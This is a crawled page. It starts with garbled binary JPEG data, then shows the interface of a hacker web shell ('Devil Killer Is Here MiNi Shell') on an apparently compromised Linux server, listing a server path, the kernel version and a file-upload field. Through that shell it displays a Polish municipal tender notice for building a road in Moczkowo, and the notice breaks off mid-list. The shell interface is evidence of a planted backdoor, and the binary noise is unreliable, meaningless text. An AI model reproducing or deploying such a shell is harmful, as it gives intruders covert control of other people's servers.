JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240607/0035715401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa ul. Źródlanej w Moczkowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA BARLINEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 210967047</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Niepodległości 20</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Barlinek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">74-320</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">95 476 55 77</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargipubliczne@barlinek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.barlinek.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ul. Źródlanej w Moczkowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bec68cc0-24ad-11ef-87ba-8eb060fd7bb8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00357154</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00572264/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa ul. Źródlanej w Moczkowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/barlinek <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a<br/>Wykonawcami odbywa się przy użyciu strony internetowej https://platformazakupowa.pl/ pod <br/>adresem https://platformazakupowa.pl/pn/barlinek.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana <br/>informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a <br/>Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie PZP, odbywa się przy użyciu <br/>środków komunikacji elektronicznej. Poprzez środki komunikacji elektronicznej rozumie się <br/>środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o <br/>świadczeniu usług drogą elektroniczną.<br/><br/>W postępowaniu o udzielenie zamówienia publicznego sposób sporządzenia dokumentów <br/>elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady <br/>Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania <br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków <br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub <br/>konkursie (Dz. U. z 2020 poz. 2452).<br/><br/>Instrukcja składania ofert oraz sposobu komunikowania się Zamawiającego z <br/>Wykonawcami, zwana dalej „instrukcją”, jest integralną częścią <br/>https://platformazakupowa.pl/ i dostępna jest na stronie dotyczącej prowadzonego <br/>postępowania.<br/><br/>Składanie oświadczeń, zawiadomień oraz przekazywanie informacji (np. zadawanie pytań, <br/>uzupełnianie oświadczeń lub dokumentów na wezwanie Zamawiającego) odbywa się <br/>elektronicznie za pośrednictwem strony internetowej https://platformazakupowa.pl/pn/barlinek<br/>i formularza „Wyślij wiadomość” dostępnego na stronie prowadzonego postępowania.<br/><br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje <br/>się datę ich przesłania za pośrednictwem https://platformazakupowa.pl/pn/barlinek poprzez <br/>kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po którym pojawi się komunikat, <br/>że wiadomość została wysłana do Zamawiającego.<br/><br/>Oświadczenia lub dokumenty przekazywane za pośrednictwem środka komunikacji <br/>elektronicznej przesyła się w formatach danych określonych w przepisach wydanych na <br/>podstawie § 2 ust. 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w <br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla <br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o <br/>udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). <br/><br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym <br/>wskazaniem na pdf. <br/><br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego w <br/>formatów: .zip .7Z.<br/><br/>Pozostałe szczegóły dotyczące wymagań technicznych i organizacyjnych zawiera rozdział 11 SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z <br/>dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy <br/>95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja <br/>2016 r., str. 1 – „RODO”) Zamawiający informuje, iż: <br/>a) administratorem Pani/Pana danych osobowych jest Gmina Barlinek, ul. Niepodległości 20, 74-<br/>320 Barlinek tel. 95 746 55 58; FAX: 95 746 17 04, e-mail: umig@barlinek.pl,<br/>b) administratorem danych osobowych w Gminie Barlinek jest Bernarda Lewandowska –<br/>Burmistrz Barlinka,<br/>c) administrator wyznaczył Inspektora Ochrony Danych Osobowych - p. Robert Józefowicz, z <br/>którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się <br/>za pośrednictwem poczty elektronicznej pod adresem iod@barlinek.pl.<br/><br/>Pozostałe szczegóły dotyczące wymagań technicznych i organizacyjnych zawiera rozdział 22 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RID.VII.271.4.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych polegających na budowie <br/>drogi gminnej w Moczkowie, ul. Źródlana, zlokalizowanej na działkach geodezyjnych nr <br/>ewid. 336/13, 336/15, 336/17, 336/19, 336/21, 336/23, 336/25, 334/44, 335, 334/29 obr. <br/>Moczkowo.<br/><br/>Projekt zakłada wykonanie drogi gminnej o łącznej długości ok. 300 m, w ramach budowy <br/>przewidziano również m.in. przebudowę jezdni o szerokości 5,0 m wraz z placem do <br/>zawracania na zakończeniu projektowanego odcinka, budowę chodnika (strona lewa) o <br/>szerokości 2,0 m oraz budowę zjazdów indywidualnych na teren istniejących posesji oraz drogi <br/>wewnętrzne. <br/><br/>Zakres rzeczowy przedmiotu zamówienia obejmuje budowę ul. Źródlanej , w zakresie <br/>wskazanym w dokumentacji projektowej, to jest m.in.:<br/>1) budowę drogi gminnej o długości ok. 300 m, w ramach której zaprojektowano oś jezdni ul. <br/>Źródlanej w nawiązaniu do istniejącego zjazdu na DW nr 151. Szerokość jezdni o nawierzchni <br/>z elementów betonowych zaprojektowanego odcinka wynosi 5,0 m,<br/>2) przebudowę skrzyżowania DW nr 151 w ciągu ul. Gorzowskiej w Moczkowie na dz. nr 306 <br/>obr. Moczkowo, w zakresie skrzyżowania z ul. Źródlaną,<br/>3) wykonanie na zakończeniu ul. Źródlanej placu do zawracania o wymiarach 12,0 x 12,0 m,<br/>4) budowę chodnika (strona lewa) o szerokości 2,0 m,<br/>5) budowę zatok postojowych, dla samochodów postojowych o szerokości 5,0 m (szerokość <br/>stanowisk postojowych 2,5m, dla osób niepełnosprawnych 3,60 m),<br/>6) budowę zjazdów indywidualnych na teren istniejących posesji oraz drogi wewnętrzne, <br/>7) dostosowanie istniejącej szafy oświetleniowej nr 3210013-047 oraz zmianę sposobu montażu <br/>istniejącej oprawy oświetleniowej na wymienionym i przesuniętym słupie nr II/3,<br/>8) przebudowę sieci oświetleniowej na ul. Źródlanej polegającą na dobudowie sześciu nowych <br/>słupów oświetleniowych, przesunięciu jednego istniejącego słupa oświetleniowego oraz <br/>wykonaniu siedmiu nowych odcinków linii kablowych,<br/>9) przesunięcie wraz z wymianą słupa nr II/3 linii napowietrznej nn-0,4kV,<br/>10) przebudowę linii kablowej nn-o,4kV kier. ZK1-1P dz. nr 334/34,<br/>11) przebudowę przyłącza napowietrznej zasilającego budynek nr 35, <br/>12) przebudowę przyłącza kablowego zasilającego dz. nr 336/11. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób obliczania punktów dla poszczególnych kryteriów:<br/><br/>1. W ramach kryterium „Cena brutto” oceniana będzie cena łączna brutto podana w <br/>formularzu oferty.<br/>W ramach kryterium „Cena brutto” ocena ofert zostanie dokonana przy zastosowaniu <br/>wzoru: <br/><br/> Cn<br/> C = ------------ x 60 % x 100 pkt<br/> Co<br/><br/>gdzie:<br/><br/>C – liczba punktów w ramach kryterium „Cena brutto”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej <br/><br/>2. W ramach kryterium „Okres Gwarancji” oceniany będzie Okres Gwarancji na wykonane <br/>roboty budowlane licząc od dnia odbioru końcowego Przedmiotu Umowy. Do oceny w <br/>ramach kryterium zostanie przyjęty Okres Gwarancji zawarty w formularzu oferty. Okres <br/>Gwarancji należy podać w miesiącach. Wykonawca nie może zaoferować Okresu <br/>Gwarancji krótszego niż 48 miesięcy. Maksymalny Okres Gwarancji przyjęty do oceny <br/>ofert wyniesie 60 miesięcy, co oznacza, że w przypadku zaoferowania Okresu Gwarancji <br/>na okres dłuższy niż 60 miesięcy do oceny w ramach kryterium oceny ofert przyjęte <br/>zostanie 60-miesięczny Okres Gwarancji.<br/><br/>Podanie przez Wykonawcę krótszego okresu gwarancji niż 48 miesięcy skutkować będzie <br/>odrzuceniem oferty. W przypadku braku podania w ofercie Okresu Gwarancji, <br/>Zamawiający uzna, że Wykonawca zapewnia minimalną długość okresu gwarancji <br/>wymaganą przez Zamawiającego. W ramach kryterium „Okres Gwarancji” sposób <br/>przyznania punktów będzie dokonany przy zastosowaniu wzoru: <br/><br/>Go <br/>G = ------------ x 40 % x 100 pkt<br/>Gn <br/><br/>gdzie:<br/><br/>G – liczba punktów w ramach kryterium „Okres Gwarancji”,<br/>Gn – najdłuższy zaoferowany Okres Gwarancji,<br/>Go – Okres Gwarancji oferty ocenianej. <br/><br/>Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów <br/>wyliczoną zgodnie ze wzorem: <br/>O = C + G gdzie:<br/>O – całkowita liczba punktów<br/>C- punkty uzyskane w kryterium „Cena brutto”<br/>G – punkty uzyskane w kryterium „Okres gwarancji”<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/><br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej <br/>ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera <br/>spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. <br/>Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający <br/>wybiera ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym <br/>mowa w zdaniu poprzednim, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do <br/>złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową <br/>cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki udziału w <br/>postępowaniu dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do występowania <br/>w obrocie gospodarczym. <br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu do warunku <br/>posiadania uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej. <br/><br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełnienia warunku udziału <br/>w postępowaniu w odniesieniu do warunku dot. sytuacji ekonomicznej.<br/>Warunek w odniesieniu do sytuacji finansowej zostanie spełniony jeśli Wykonawca wykaże, <br/>że posiada środki finansowe lub zdolność kredytową w wysokości nie niższej, niż 320.000,00 <br/>złotych (słownie: trzysta dwadzieścia tysięcy złotych 00/100).<br/><br/>4) zdolności technicznej lub zawodowej<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za spełniony, jeśli Wykonawca<br/>wykaże, że w okresie ostatnich 5 lat liczonych wstecz od dnia, w którym upływa termin <br/>składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie): <br/>a) zrealizował co najmniej dwie roboty budowlane polegające na budowie lub przebudowie <br/>lub remoncie drogi lub innej nawierzchni utwardzonej z kostki betonowej, kostki <br/>brukowej, kostki kamiennej lub płyt ażurowych o powierzchni co najmniej 1 000 m2<br/>każda (Zamawiający uzna roboty budowlane polegające na budowie, przebudowie,<br/>remoncie drogi lub innej nawierzchni jeżeli nawierzchnia drogi została wykonana z <br/>więcej, niż jednego z ww. materiału). Przez jedną robotę rozumie się roboty budowlane <br/>wykonane na podstawie jednej umowy.<br/><br/>Warunek ten, w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia,<br/>zostanie uznany za spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie <br/>dysponować: <br/><br/>a) osobą, która będzie pełnić funkcję kierownika budowy (1 osoba) – posiadającą <br/>uprawnienia budowlane do kierowania robotami budowlanymi w specjalności <br/>inżynieryjnej drogowej w co najmniej ograniczonym zakresie oraz minimum 5– letnie <br/>doświadczenie zawodowe w pełnieniu funkcji kierownika budowy/kierownika robót <br/>w tej specjalności. Doświadczenie zawodowe należy liczyć od dnia uzyskania <br/>uprawnień w danej specjalności. <br/><br/>b) osobą, która będzie pełnić funkcję kierownika robót elektrycznych, posiadającą <br/>uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci, <br/>instalacji i urządzeń elektrycznych i elektroenergetycznych w co najmniej <br/>ograniczonym zakresie oraz minimum 3 - letnie doświadczenie zawodowe w <br/>pełnieniu funkcji kierownika budowy/kierownika robót w tej specjalności. <br/><br/>Doświadczenie zawodowe należy liczyć od dnia uzyskania uprawnień w danej <br/>specjalności. <br/><br/>Nakładające się na siebie okresy pełnienia funkcji kierownika budowy/kierownika <br/>robót nie sumują się.<br/><br/>Zamawiający dopuszcza możliwość łączenia poszczególnych funkcji, o ile osoby <br/>spełniają warunki określone dla każdej z funkcji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, o których mowa w pkt 7.1., 7.3 i 7.4 <br/>Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1 PZP <br/>wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, <br/>nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia następujących podmiotowych <br/>środków dowodowych:<br/><br/>a) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku <br/>przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (tekst jedn. Dz. U. z 2021 r. poz. 275), <br/>z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową, albo <br/>oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami <br/>lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej <br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej (wzór <br/>oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o przynależności lub <br/>braku przynależności do tej grupy kapitałowej stanowi załącznik nr 8 do SWZ),<br/><br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i <br/>Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) PZP, <br/>sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji,<br/><br/>c) oświadczenia o aktualności informacji zawartych w oświadczeniu, o którym mowa w <br/>art. 125 ust. 1 PZP, w zakresie podstaw wykluczenia z postępowania wskazanych <br/>przez Zamawiającego (według wzoru stanowiącego załącznik nr 4 do SWZ), o <br/>których mowa w:<br/>1) art. 108 ust. 1 pkt 3 PZP,<br/>2) art. 108 ust. 1 pkt 4 PZP, dotyczących orzeczenia zakazu ubiegania się o <br/>zamówienie publiczne tytułem środka zapobiegawczego,<br/>3) art. 108 ust. 1 pkt 5 PZP, 